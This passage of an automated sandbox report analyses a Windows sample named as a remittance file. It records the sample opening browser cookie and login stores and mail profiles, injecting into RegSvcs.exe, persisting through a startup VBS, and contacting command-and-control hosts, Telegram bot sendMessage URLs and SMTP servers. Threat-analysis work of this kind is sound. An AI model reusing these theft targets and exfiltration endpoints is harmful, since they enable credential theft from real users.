                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: name.exe | Binary or memory string: WIN_XP
                  Source: name.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: name.exe | Binary or memory string: WIN_XPe
                  Source: name.exe | Binary or memory string: WIN_VISTA
                  Source: name.exe | Binary or memory string: WIN_7
                  Source: name.exe | Binary or memory string: WIN_8
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4562656465.00000000026CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_004652BE
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00476619
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,6_2_0046CEF3
                  MITRE ATT&CK Matrix (one line per tactic column; a leading number is the signature-count badge shown on a matched technique)

                  Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
                  Resource Development: 111 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
                  Initial Access: 2 Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
                  Execution: 2 Native API | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
                  Persistence: 111 Scripting | 1 DLL Side-Loading | 2 Valid Accounts | 2 Registry Run Keys / Startup Folder | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
                  Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 DLL Side-Loading | 2 Valid Accounts | 21 Access Token Manipulation | 212 Process Injection | 2 Registry Run Keys / Startup Folder | Startup Items | Scheduled Task/Job | At | Cron
                  Defense Evasion: 11 Disable or Modify Tools | 11 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 1 DLL Side-Loading | 11 Masquerading | 2 Valid Accounts | 11 Virtualization/Sandbox Evasion | 21 Access Token Manipulation | 212 Process Injection | Dynamic API Resolution
                  Credential Access: 1 OS Credential Dumping | 21 Input Capture | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
                  Discovery: 2 System Time Discovery | 1 Account Discovery | 3 File and Directory Discovery | 117 System Information Discovery | 121 Security Software Discovery | 11 Virtualization/Sandbox Evasion | 2 Process Discovery | 11 Application Window Discovery | 1 System Owner/User Discovery | 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
                  Collection: 11 Archive Collected Data | 1 Data from Local System | 1 Email Collection | 21 Input Capture | 3 Clipboard Data | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
                  Command and Control: 1 Web Service | 4 Ingress Tool Transfer | 11 Encrypted Channel | 1 Non-Standard Port | 3 Non-Application Layer Protocol | 24 Application Layer Protocol | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
                  Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1518314
                  Sample: z84TTREMITTANCEUSD347_432_63.exe
                  Startdate: 25/09/2024
                  Architecture: WINDOWS
                  Score: 100

                  Contacted domains: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains
                  Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures

                  Process chain 1:
                    z84TTREMITTANCEUSD347_432_63.exe started
                      dropped: C:\Users\user\AppData\Local\...\name.exe, PE32
                      name.exe started
                        dropped: C:\Users\user\AppData\Roaming\...\name.vbs, data
                        signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Drops VBS files to the startup folder; Switches to a custom stack to bypass stack traces
                        RegSvcs.exe started
                          network: api.telegram.org 149.154.167.220, 443, 49722, 49745 TELEGRAMRU United Kingdom; us2.smtp.mailhostbox.com 208.91.198.143, 49727, 49746, 587 PUBLIC-DOMAIN-REGISTRYUS United States; 2 other IPs or domains

                  Process chain 2:
                    wscript.exe started
                      signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      name.exe started
                        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                        RegSvcs.exe started
                          signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                  Source | Detection | Scanner | Label
                  z84TTREMITTANCEUSD347_432_63.exe | 100% | Avira | HEUR/AGEN.1321293
                  z84TTREMITTANCEUSD347_432_63.exe | 100% | Joe Sandbox ML |

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\directory\name.exe | 100% | Avira | HEUR/AGEN.1321293
                  C:\Users\user\AppData\Local\directory\name.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
                  https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
                  http://checkip.dyndns.org | 0% | URL Reputation | safe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                  https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                  http://varders.kozow.com:8081 | 0% | URL Reputation | safe
                  http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
                  https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
                  http://checkip.dyndns.org/ | 0% | URL Reputation | safe
                  http://51.38.247.67:8081/_send_.php?L | 0% | URL Reputation | safe
                  http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                  http://checkip.dyndns.org/q | 0% | URL Reputation | safe
                  https://reallyfreegeoip.org | 0% | URL Reputation | safe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
                  https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
                  https://www.office.com/ | 0% | Avira URL Cloud | safe
                  https://api.telegram.org | 0% | Avira URL Cloud | safe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
                  https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
                  http://us2.smtp.mailhostbox.com | 0% | Avira URL Cloud | safe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a | 0% | Avira URL Cloud | safe
                  https://www.office.com/lBjq | 0% | Avira URL Cloud | safe
                  https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | Avira URL Cloud | safe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
                  https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
                  https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | Avira URL Cloud | safe
                  https://chrome.google.com/webstore?hl=enlBjq | 0% | Avira URL Cloud | safe
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  us2.smtp.mailhostbox.com | 208.91.198.143 | true | true | | unknown
                  reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
                  api.telegram.org | 149.154.167.220 | true | true | | unknown
                  checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
                  checkip.dyndns.org | unknown | unknown | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
                  https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
                  http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://www.office.com/ | RegSvcs.exe, 00000007.00000002.4562785704.0000000002F64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://api.telegram.org | RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.telegram.org/bot | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://us2.smtp.mailhostbox.com | RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.office.com/lBjq | RegSvcs.exe, 00000003.00000002.4562656465.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000007.00000002.4562785704.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F73000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://varders.kozow.com:8081 | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://aborters.duckdns.org:8081 | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
| https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://reallyfreegeoip.org/xml/8.46.123.33$ | RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.000000000263B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://anotherarmy.dns.army:8081 | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4560135222.0000000000393000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://checkip.dyndns.org/q | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.4562656465.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000003.00000002.4566215567.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4565975328.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://chrome.google.com/webstore?hl=enlBjq | RegSvcs.exe, 00000003.00000002.4562656465.000000000277E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://reallyfreegeoip.org/xml/ | name.exe, 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002611000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
